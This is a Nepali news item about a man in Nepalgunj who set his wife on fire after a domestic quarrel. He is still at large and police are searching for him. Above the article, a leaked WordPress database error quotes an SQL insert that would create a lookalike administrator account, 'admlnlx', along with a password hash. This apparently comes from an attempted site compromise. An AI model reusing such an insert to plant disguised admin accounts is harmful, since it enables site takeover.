WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bp7Jh8A9uoOdKOuTj7RvcPO8D07WGL.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 20:41:10', '', 'admlnlx', 'admlnlx')
नेपालगन्ज, माघ ७-
सामान्य घर झगडामा एक व्यक्तिले श्रीमतीलाई ज्यूँदै आगो लगाइदिएका छन् । नेपालगन्ज १२ खट्कनपुरुवाका २६ वर्षे राजेन्द्र खटिकले श्रीमती अमिसा खटिकलाई मट्टितेल खन्याएर आगो लगाइदिएका हुन् ।
२२ वर्षीया श्रीमती खटिकको शरीर पूरै जलेको छ । प्रहरी कार्यालय नेपालगन्जका अनुसार उनको छाती, मुख, हात धेरै जलेको छ । त्यस्तै घाँटी पनि धेरै भित्रैसम्म जलेको छ ।
बिहीबार राति घर झगडा भएपछि राजेन्द्रले बलिरहेको टुकीको मट्टीतेल खन्याएर श्रीमतिको शरीरमा आगो लगाइदिएका थिए । अमिसाको अहिले भेरी अञ्चल अस्पतालमा उपचार भइरहेको छ । आगो लगाइदिएपछि राजेन्द्र फरार छन् ।
केही वर्ष विदेशमा बसेर आएका राजेन्द्र र उनकी श्रीमतीबीच लामो समयदेखि झगडा हुँदै आएको थियो । उनको डेढ वर्षीया छोरी पनि छन् । प्रहरीले उनको खोजी भइरहेको जनाएको छ ।